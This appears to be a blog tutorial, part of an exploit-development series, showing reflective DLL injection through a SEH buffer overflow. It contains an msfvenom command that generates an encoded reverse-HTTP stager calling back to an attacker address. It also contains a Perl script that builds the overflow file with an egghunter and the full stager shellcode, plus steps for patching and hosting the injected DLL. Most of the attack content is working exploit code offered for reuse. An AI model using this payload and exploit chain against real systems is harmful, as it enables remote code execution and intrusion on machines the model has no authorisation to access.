Exploit Development 5: Reflective DLL Injection

Introduction

Reflective DLL injection is being used to inject a DLL into a process without reading it from the storage. A stager is executed from the exploited buffer, which in turn retrieves the DLL from a server. The DLL is directly loaded and mapped into the process address space and execution is being handed over to the DLL’s entry point.

To understand the evolution of memory DLL injection, I recommend to read the following 2 papers in the given order:

Setup

We’ll use the exploit from the previous egg hunting tutorial.

Implementation

Stager

Metasploit offers different stagers to perform the retrieval and injection of a DLL. The reverse HTTP stager will be used in this tutorial.

Generate the payload as follows:


msfvenom -p windows/dllinject/reverse_http lhost=192.168.29.1 lport=80 dll=. -e x86/shikata_ga_nai -b '\x00\x1a' -f perl

Insert the generated shellcode into the exploit script:

my $file = "attack_test.txt";

my $overflow = "0123456789ABCDEF";
my $eip = "AAAA";
my $fill = "B" x 52;

my $nextseh = "\xeb\x06\x90\x90";
my $seh = pack('V',0x123418D4);
my $padding = "\x90" x 0x29;

my $egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t".
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

my $reverse_http_stager =
"\xb8\xc9\xb5\x30\xb9\xdb\xd6\xd9\x74\x24\xf4\x5d\x29\xc9" .
"\xb1\x5e\x31\x45\x15\x03\x45\x15\x83\xc5\x04\xe2\x3c\x49" .
"\xd8\x3b\xbe\xb2\x19\x5c\x37\x57\x28\x5c\x23\x13\x1b\x6c" .
"\x20\x71\x90\x07\x64\x62\x23\x65\xa0\x85\x84\xc0\x96\xa8" .
"\x15\x78\xea\xab\x95\x83\x3e\x0c\xa7\x4b\x33\x4d\xe0\xb6" .
"\xb9\x1f\xb9\xbd\x6f\xb0\xce\x88\xb3\x3b\x9c\x1d\xb3\xd8" .
"\x55\x1f\x92\x4e\xed\x46\x34\x70\x22\xf3\x7d\x6a\x27\x3e" .
"\x34\x01\x93\xb4\xc7\xc3\xed\x35\x6b\x2a\xc2\xc7\x72\x6a" .
"\xe5\x37\x01\x82\x15\xc5\x11\x51\x67\x11\x94\x42\xcf\xd2" .
"\x0e\xaf\xf1\x37\xc8\x24\xfd\xfc\x9f\x63\xe2\x03\x4c\x18" .
"\x1e\x8f\x73\xcf\x96\xcb\x57\xcb\xf3\x88\xf6\x4a\x5e\x7e" .
"\x07\x8c\x01\xdf\xad\xc6\xac\x34\xdc\x84\xb8\xa4\xbb\x42" .
"\x39\x51\x34\xc2\x57\xc8\xee\x7c\xe4\x7d\x28\x7a\x0b\x54" .
"\x05\x5f\xa0\x04\x36\x0c\x14\xc3\x82\xe4\xe3\xb4\x0d\xdd" .
"\x47\xe8\x9b\xdd\x34\x5d\x31\xb2\x52\xc5\xc5\x32\xa3\x29" .
"\x9c\x55\xc4\x04\x57\xe9\x7a\x1e\x12\x69\x30\xaa\x83\x28" .
"\xac\x12\x0b\x9d\x5b\x39\x5c\x70\xce\xff\xc7\x17\x9f\xcf" .
"\x40\x94\x0a\x72\x1f\x67\xf0\x1d\xf2\x32\xa2\x8e\x60\xdb" .
"\x0a\x08\x01\x65\x9b\xd8\xc8\x5e\xad\x1c\x7a\xc9\x06\x94" .
"\xe5\xcf\x56\x73\x90\x16\xfb\x14\xa2\x94\x9c\x60\xf1\xcb" .
"\x0f\x3e\xa6\xbd\xc7\x2b\x1d\x6c\x23\x53\x48\xe6\x39\xa1" .
"\x2d\x54\xed\xe6\x82\x0c\x79\x24\x22\xa9\x02\xc9\xff\x4c" .
"\x34\x40\xf7\x01\xc0\x46\xef\xd7\x2a\x99\xef\x8d\x6a\xf1" .
"\xef\x41\x6b\x01\x87\x61\x6b\x41\x57\x31\x03\x19\xf3\xe6" .
"\x36\x66\x2e\x9b\xea\xca\x59\x7b\x5b\x85\x59\xa4\x64\x55" .
"\x0a\xf2\x0c\x47\x3a\x73\x2e\x98\x97\x01\x6f\x13\xd8\x81" .
"\x77\xdd\x25\x10\xb7\xa8\x4c\x43\xfb\x0c\x66\xff\x04\x4d" .
"\x89\x31\xc2\x80\x5b\x03\x02\xdd\x8d\x51\x53\x33\xe0\x95" .
"\x18\xbb\xb7\x34\x08\x56\xb7\x6b\x4a\x73";

open($FILE,">$file");
print $FILE $overflow.$eip.$fill.$nextseh.$seh.$egghunter.$padding."w00tw00t".$reverse_http_stager;
close($FILE);
print "File created\n";

Compile Reflective DLL

Get Steven Fewer’s ReflectiveDLLInjection code repository. Add your code and compile it.

Patch Reflective DLL

Normally Metasploit takes care of adding a small bootstrapper into the reflective DLL header prior delivering it. But in the scenario of a self hosted reflective DLL via a web server, it is necessary to patch it manually.

For this purpose use Borja Merino’s Python script: https://github.com/BorjaMerino/reflectPatcher.py/blob/master/reflectPatcher.py

The script places 4 bytes with size information in front of the actual header. These 4 bytes are not needed in the case of using a HTTP stager, so it is necessary to remove them with a hex editor.

Hosting Reflective DLL

The stager uses a GET HTTP request that is composed of a random string. Depending on the web server in use, it may be required to map the request string to the actual DLL file either by using aliases, URL manipulation or by other means.

Exploit execution

Run the exploit and watch the DLL injection in action:

5-dllinjectionexploit

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s